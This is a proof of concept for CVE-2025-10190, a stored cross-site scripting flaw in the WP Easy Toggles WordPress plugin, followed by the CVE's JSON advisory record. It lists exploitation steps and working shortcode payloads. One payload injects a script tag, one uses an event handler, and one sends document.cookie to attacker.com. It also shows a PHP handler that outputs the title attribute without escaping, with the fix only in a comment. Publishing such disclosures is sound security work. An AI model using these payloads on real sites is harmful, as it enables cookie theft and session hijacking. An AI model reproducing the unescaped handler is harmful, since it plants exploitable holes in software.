CVE-2025-10190

<!-- PoC for CVE-2025-10190: Stored XSS in WP Easy Toggles plugin Affected: WP Easy Toggles <= 1.9.0 Required: Contributor or higher WordPress user role --> <!-- Step 1: Login as Contributor or higher role --> <!-- Step 2: Create a new Post or Page --> <!-- Step 3: Insert the following shortcode in the content editor (Text/HTML mode) --> [toggles title='"><script>alert("XSS-CVE-2025-10190-"+document.cookie)</script>' content="Test"] <!-- Alternative PoC using event handlers --> [toggles title='" onmouseover="alert(document.domain)" x="' content="Hover me"] <!-- Alternative PoC for cookie stealing --> [toggles title='"><img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>' content="Click"] <!-- Step 4: Publish the post --> <!-- Step 5: When any user visits the published page, the injected JavaScript will execute --> <?php // Example of vulnerable shortcode handler (simplified): // The plugin does NOT sanitize the 'title' attribute before output function wp_easy_toggles_shortcode($atts) { $atts = shortcode_atts(array( 'title' => '', 'content' => '' ), $atts); // VULNERABLE: Direct output without escaping return '<div class="toggle-title">' . $atts['title'] . '</div>'; // FIXED version should use: // return '<div class="toggle-title">' . esc_html($atts['title']) . '</div>'; } add_shortcode('toggles', 'wp_easy_toggles_shortcode'); ?>

{"cve": {"id": "CVE-2025-10190", "sourceIdentifier": "[email protected]", "published": "2025-10-11T10:15:42.147", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Easy Toggles plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'toggles' shortcode in all versions up to, and including, 1.9.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-easy-toggles/trunk/wp-easy-toggles.php#L31", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/wp-easy-toggles", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5a9db562-6810-4da1-9e5f-6f6eadca76ac?source=cve", "source": "[email protected]"}]}}